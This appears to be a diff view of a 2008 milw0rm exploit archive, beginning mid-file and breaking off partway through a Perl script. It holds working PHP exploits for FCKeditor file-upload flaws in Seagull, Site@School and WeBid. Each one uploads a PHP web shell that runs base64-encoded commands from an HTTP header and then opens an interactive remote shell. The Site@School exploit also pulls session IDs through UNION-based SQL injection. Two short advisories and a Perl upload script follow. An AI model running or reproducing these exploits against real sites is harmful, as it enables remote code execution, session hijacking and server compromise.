print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /seagull/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$filename = md5(time()).".php.php4";
$connector = "tinyfck/filemanager/connectors/php/connector.php";
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n\r\n";
$payload .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
preg_match("/OnUploadCompleted\((.*),\"(.*)\"\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
while(1)
{
print "\nseagull-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}images/File/{$html[2]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-06-26]
<?php
/*
------------------------------------------------------------------------
Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit
------------------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://seagullproject.org/
details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
[-] vulnerable code in /www/tinyfck/filemanager/connectors/php/config.php
33. // SECURITY: You must explicitelly enable this "connector". (Set it to "true").
34. $Config['Enabled'] = true ;
35.
36. // Path to user files relative to the document root.
37. $Config['UserFilesPath'] = SGL_BASE_URL . '/images/' ;
38.
39. // Fill the following value it you prefer to specify the absolute path for the
40. // user files directory. Usefull if you are using a virtual directory, symbolic
41. // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
42. // Attention: The above 'UserFilesPath' must point to the same directory.
43. $Config['UserFilesAbsolutePath'] = SGL_WEB_ROOT.'/images/';
44.
45. $Config['AllowedExtensions']['File'] = array() ;
46. $Config['DeniedExtensions']['File'] = array('php','php3','php5','phtml','asp','aspx','ascx','jsp','cfm', [...]
47.
48. $Config['AllowedExtensions']['Image'] = array('jpg','gif','jpeg','png') ;
49. $Config['DeniedExtensions']['Image'] = array() ;
50.
51. $Config['AllowedExtensions']['Flash'] = array('swf','fla') ;
52. $Config['DeniedExtensions']['Flash'] = array() ;
53.
54. $Config['AllowedExtensions']['Media'] = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;
55. $Config['DeniedExtensions']['Media'] = array() ;
with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+--------------------------------------------------------------------+";
print "\n| Seagull <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /seagull/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$filename = md5(time()).".php.php4";
$connector = "tinyfck/filemanager/connectors/php/connector.php";
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n\r\n";
$payload .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
preg_match("/OnUploadCompleted\((.*),\"(.*)\"\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
while(1)
{
print "\nseagull-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}images/File/{$html[2]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-06-26]

View file

@ -1,194 +1,194 @@
<?php
/*
-------------------------------------------------------------------------
Site@School <= 2.4.10 (fckeditor) Session Hijacking / File Upload Exploit
-------------------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://siteatschool.sourceforge.net/
details..: works with magic_quotes_gpc = off (the bug isn't still patched: http://www.securityfocus.com/bid/27120)
details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
[-] vulnerable code in /starnet/editors/fckeditor/editor/filemanager/sas/browser.php
63. $query = "SELECT config_value FROM $table_configuration WHERE config_key='sessioncode'";
64. if ($result = mysql_query($query))
65. {
66. $check_sessioncode = mysql_result($result, 0);
67. unset ($query);
68. unset ($result);
69. }
70. if ($_SESSION['sessioncode'] != $check_sessioncode)
71. {
72. //if we don't have a session present the login screen
73. Header("Location: ../../../../../index.php");
74. exit;
75. }
[...]
117. if ($option == "upload")
118. {
119. if (IsSet ($_FILES["new_file"]["name"]))
120. {
121. $file_name = $_FILES["new_file"]["name"];
122. }
123. if (IsSet ($_SESSION['opendir']))
124. {
125. $write_path = $_SESSION['user_media_path'] . "/" . $_SESSION['opendir'];
126. // moveupload the file to $write_path, function is in core/common.inc.php
127. $temp_file = $_FILES["new_file"]["tmp_name"]; //this is temporary uploaded file.
128. sas_move_uploaded_file($write_path, $file_name, $temp_file);
129. }
130. $opendir = $_SESSION['opendir']; //for returning to the directory were we came from
131. }
an attacker could be able to retrieve a valid session id using the SQL injection bug in /starnet/addons/slideshow_full.php
(http://www.milw0rm.com/exploits/4832) and bypass checks at lines 70-75 to upload malicious files containing php code!
*/
error_reporting(0);
ini_set("default_socket_timeout",5);
set_time_limit(0);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...\n";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path, $sid;
$file_ext = array(".fla", ".swf", ".rar", ".zip", ".xls", ".csv");
$packet = "GET {$path}starnet/editors/fckeditor/editor/filemanager/sas/images.php?opendir=gallery HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID={$sid}\r\n";
$packet .= "Connection: close\r\n\r\n";
http_send($host, $packet);
foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with {$ext} extension...";
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"new_file\"; filename=\"test.php{$ext}\"\r\n\r\n";
$payload .= "<?php \${error_reporting(0)}.\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}starnet/editors/fckeditor/editor/filemanager/sas/browser.php?option=upload HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID={$sid}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
if (preg_match("/File upload error/i", http_send($host, $packet))) die("\n[-] Upload failed!\n");
$packet = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
sleep(1);
}
return false;
}
function get_sid()
{
global $host, $path, $prefix;
// thanks to rgod for giving to understand that this isn't blind injetion...r.i.p. my friend!
$sql = "'/**/UNION/**/SELECT/**/CONCAT(CHAR(0xFF),ses_id,CHAR(0xFF),CHAR(0x27)),1,1/**/" .
"FROM/**/{$prefix}_sessions/**/WHERE/**/ses_value/**/LIKE/**/'%sessioncode%'%23";
$packet = "GET {$path}starnet/addons/slideshow_full.php?album_name={$sql} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$pieces = explode(chr(0xFF), http_send($host, $packet));
return $pieces[1];
}
function check_target()
{
global $host, $path, $prefix;
print "\n[-] Checking {$host}...";
$packet = "GET {$path}starnet/addons/slideshow_full.php?album_name=%27 HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
if (preg_match("/FROM (.*)_m/", http_send($host, $packet), $match)) print "vulnerable!\n";
else die("not vulnerable!\n\n[-] Exploit failed...probably magic_quotes_gpc = on\n");
$prefix = $match[1];
}
print "\n+-----------------------------------------------------------------------+";
print "\n| Site@School <= 2.4.10 Session Hijacking / File Upload Exploit by EgiX |";
print "\n+-----------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage...: php $argv[0] host path \n";
print "\nhost....: target server (ip/hostname)";
print "\npath....: path to sas directory\n";
die();
}
$host = $argv[1];
$path = $argv[2];
check_target();
$sid = get_sid();
if (empty($sid)) die("\n[-] Session id not found! Try later...\n");
else print "\n[-] Hijacking with sid {$sid}\n";
if (!($ext = upload())) die("\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
while(1)
{
print "\nsas-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-07-04]
<?php
/*
-------------------------------------------------------------------------
Site@School <= 2.4.10 (fckeditor) Session Hijacking / File Upload Exploit
-------------------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://siteatschool.sourceforge.net/
details..: works with magic_quotes_gpc = off (the bug isn't still patched: http://www.securityfocus.com/bid/27120)
details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
[-] vulnerable code in /starnet/editors/fckeditor/editor/filemanager/sas/browser.php
63. $query = "SELECT config_value FROM $table_configuration WHERE config_key='sessioncode'";
64. if ($result = mysql_query($query))
65. {
66. $check_sessioncode = mysql_result($result, 0);
67. unset ($query);
68. unset ($result);
69. }
70. if ($_SESSION['sessioncode'] != $check_sessioncode)
71. {
72. //if we don't have a session present the login screen
73. Header("Location: ../../../../../index.php");
74. exit;
75. }
[...]
117. if ($option == "upload")
118. {
119. if (IsSet ($_FILES["new_file"]["name"]))
120. {
121. $file_name = $_FILES["new_file"]["name"];
122. }
123. if (IsSet ($_SESSION['opendir']))
124. {
125. $write_path = $_SESSION['user_media_path'] . "/" . $_SESSION['opendir'];
126. // moveupload the file to $write_path, function is in core/common.inc.php
127. $temp_file = $_FILES["new_file"]["tmp_name"]; //this is temporary uploaded file.
128. sas_move_uploaded_file($write_path, $file_name, $temp_file);
129. }
130. $opendir = $_SESSION['opendir']; //for returning to the directory were we came from
131. }
an attacker could be able to retrieve a valid session id using the SQL injection bug in /starnet/addons/slideshow_full.php
(http://www.milw0rm.com/exploits/4832) and bypass checks at lines 70-75 to upload malicious files containing php code!
*/
error_reporting(0);
ini_set("default_socket_timeout",5);
set_time_limit(0);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...\n";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path, $sid;
$file_ext = array(".fla", ".swf", ".rar", ".zip", ".xls", ".csv");
$packet = "GET {$path}starnet/editors/fckeditor/editor/filemanager/sas/images.php?opendir=gallery HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID={$sid}\r\n";
$packet .= "Connection: close\r\n\r\n";
http_send($host, $packet);
foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with {$ext} extension...";
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"new_file\"; filename=\"test.php{$ext}\"\r\n\r\n";
$payload .= "<?php \${error_reporting(0)}.\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}starnet/editors/fckeditor/editor/filemanager/sas/browser.php?option=upload HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID={$sid}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
if (preg_match("/File upload error/i", http_send($host, $packet))) die("\n[-] Upload failed!\n");
$packet = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
sleep(1);
}
return false;
}
function get_sid()
{
global $host, $path, $prefix;
// thanks to rgod for giving to understand that this isn't blind injetion...r.i.p. my friend!
$sql = "'/**/UNION/**/SELECT/**/CONCAT(CHAR(0xFF),ses_id,CHAR(0xFF),CHAR(0x27)),1,1/**/" .
"FROM/**/{$prefix}_sessions/**/WHERE/**/ses_value/**/LIKE/**/'%sessioncode%'%23";
$packet = "GET {$path}starnet/addons/slideshow_full.php?album_name={$sql} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$pieces = explode(chr(0xFF), http_send($host, $packet));
return $pieces[1];
}
function check_target()
{
global $host, $path, $prefix;
print "\n[-] Checking {$host}...";
$packet = "GET {$path}starnet/addons/slideshow_full.php?album_name=%27 HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
if (preg_match("/FROM (.*)_m/", http_send($host, $packet), $match)) print "vulnerable!\n";
else die("not vulnerable!\n\n[-] Exploit failed...probably magic_quotes_gpc = on\n");
$prefix = $match[1];
}
print "\n+-----------------------------------------------------------------------+";
print "\n| Site@School <= 2.4.10 Session Hijacking / File Upload Exploit by EgiX |";
print "\n+-----------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage...: php $argv[0] host path \n";
print "\nhost....: target server (ip/hostname)";
print "\npath....: path to sas directory\n";
die();
}
$host = $argv[1];
$path = $argv[2];
check_target();
$sid = get_sid();
if (empty($sid)) die("\n[-] Session id not found! Try later...\n");
else print "\n[-] Hijacking with sid {$sid}\n";
if (!($ext = upload())) die("\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
while(1)
{
print "\nsas-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-07-04]

View file

@ -1,110 +1,110 @@
<?php
/*
-----------------------------------------------------------------
WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------
author...: Stack
[-] vulnerable code in /fck/editor/filemanager/browser/mcpuk/connectors/php/config.php
121. //File Area
122. $fckphp_config['ResourceAreas']['File'] =array(
123.
124. //Files(identified by extension) that may be uploaded to this area
125. 'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;
$connector = "fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php";
$file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
sleep(1);
}
return false;
}
print "\n+--------------------------------------------------------------------+";
print "\n|WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit by Stack|";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /WeBid/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nStack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-09-01]
<?php
/*
-----------------------------------------------------------------
WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------
author...: Stack
[-] vulnerable code in /fck/editor/filemanager/browser/mcpuk/connectors/php/config.php
121. //File Area
122. $fckphp_config['ResourceAreas']['File'] =array(
123.
124. //Files(identified by extension) that may be uploaded to this area
125. 'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;
$connector = "fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php";
$file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
sleep(1);
}
return false;
}
print "\n+--------------------------------------------------------------------+";
print "\n|WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit by Stack|";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /WeBid/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nStack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-09-01]

View file

@ -1,53 +1,53 @@
########################## www.BugReport.ir #######################################
#
# AmnPardaz Security Research Team
#
# Title: TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload
# Vendor: www.translucidonline.com
# Vulnerable Version: 1.75 (prior versions also may be affected)
# Exploitation: Remote with browser
# Exploit: Available
# Impact: Medium
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_51.htm
###################################################################################
####################
- Description:
####################
transLucid is the simple website publishing system with which anyone can create and maintain web content, in multiple languages and based on a
growing list of ready-made, professional layouts.
####################
- Vulnerability:
####################
+--> Fckeditor Arbitrary File Upload
The problem is that it is possible to upload files to a location inside the web root "/userdata" via the
/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php script.
####################
- Exploit:
####################
http://example.com/transLucid_175/editors/FCKeditor/editor/filemanager/browser/default/connectors/test.html
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com
# milw0rm.com [2008-09-03]
########################## www.BugReport.ir #######################################
#
# AmnPardaz Security Research Team
#
# Title: TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload
# Vendor: www.translucidonline.com
# Vulnerable Version: 1.75 (prior versions also may be affected)
# Exploitation: Remote with browser
# Exploit: Available
# Impact: Medium
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_51.htm
###################################################################################
####################
- Description:
####################
transLucid is the simple website publishing system with which anyone can create and maintain web content, in multiple languages and based on a
growing list of ready-made, professional layouts.
####################
- Vulnerability:
####################
+--> Fckeditor Arbitrary File Upload
The problem is that it is possible to upload files to a location inside the web root "/userdata" via the
/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php script.
####################
- Exploit:
####################
http://example.com/transLucid_175/editors/FCKeditor/editor/filemanager/browser/default/connectors/test.html
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com
# milw0rm.com [2008-09-03]

View file

@ -1,46 +1,46 @@
########################################################################
#
# S4rK3VT Hacking TEAM
#
# Title: KimWebsite (fckeditor) Remote Arbitrary File Upload
# Vendor: http://sourceforge.net/project/showfiles.php?group_id=196819
# discover by : Ciph3r
# We Are : Ciph3r & Rake
# Ciph3r_blackhat@yahoo.com
# Impact: Medium
# Fix: N/A
# Expl0ters Security TEAM ==>> www.Expl0iters.ir
########################################################################
####################
- Vulnerability:
####################
+--> Fckeditor Arbitrary File Upload
The problem is that it is possible to upload files to a location inside the web root "/userdata" via the
[path]/fck/editor/filemanager/upload/php/upload.php script.
####################
- Exploit:
####################
http://example.com/[path]/fck/editor/filemanager/upload/test.html
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- GreTzZ :
####################
Iranian Hacker & Kurdish Security TEAM & My Mother
####################
# milw0rm.com [2008-09-09]
########################################################################
#
# S4rK3VT Hacking TEAM
#
# Title: KimWebsite (fckeditor) Remote Arbitrary File Upload
# Vendor: http://sourceforge.net/project/showfiles.php?group_id=196819
# discover by : Ciph3r
# We Are : Ciph3r & Rake
# Ciph3r_blackhat@yahoo.com
# Impact: Medium
# Fix: N/A
# Expl0ters Security TEAM ==>> www.Expl0iters.ir
########################################################################
####################
- Vulnerability:
####################
+--> Fckeditor Arbitrary File Upload
The problem is that it is possible to upload files to a location inside the web root "/userdata" via the
[path]/fck/editor/filemanager/upload/php/upload.php script.
####################
- Exploit:
####################
http://example.com/[path]/fck/editor/filemanager/upload/test.html
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- GreTzZ :
####################
Iranian Hacker & Kurdish Security TEAM & My Mother
####################
# milw0rm.com [2008-09-09]

View file

@ -1,42 +1,42 @@
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+zanfi 1.2 Arbitrary File Upload xpl +
+ +
+Discovered by :reptil +
+ +
+ +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
# Reptil
INTRO
print "Enter URL(ie: http://site.com): ";
chomp(my $url=<STDIN>);
print "Enter File Path(path to local file to upload): ";
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/editor/filemanager/upload/php/upload.php',
Content_Type => 'form-data',
Content => [ NewFile => $file ] );
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }
exit;
##############################################################
##############################################################
*
*you can use this and upload files !
*
*http://www.site.com/editor/filemanager/upload/test.html
*
*http://www.zanfi.nl
##############################################################
##############################################################
# milw0rm.com [2008-09-10]
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+zanfi 1.2 Arbitrary File Upload xpl +
+ +
+Discovered by :reptil +
+ +
+ +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
# Reptil
INTRO
print "Enter URL(ie: http://site.com): ";
chomp(my $url=<STDIN>);
print "Enter File Path(path to local file to upload): ";
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/editor/filemanager/upload/php/upload.php',
Content_Type => 'form-data',
Content => [ NewFile => $file ] );
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }
exit;
##############################################################
##############################################################
*
*you can use this and upload files !
*
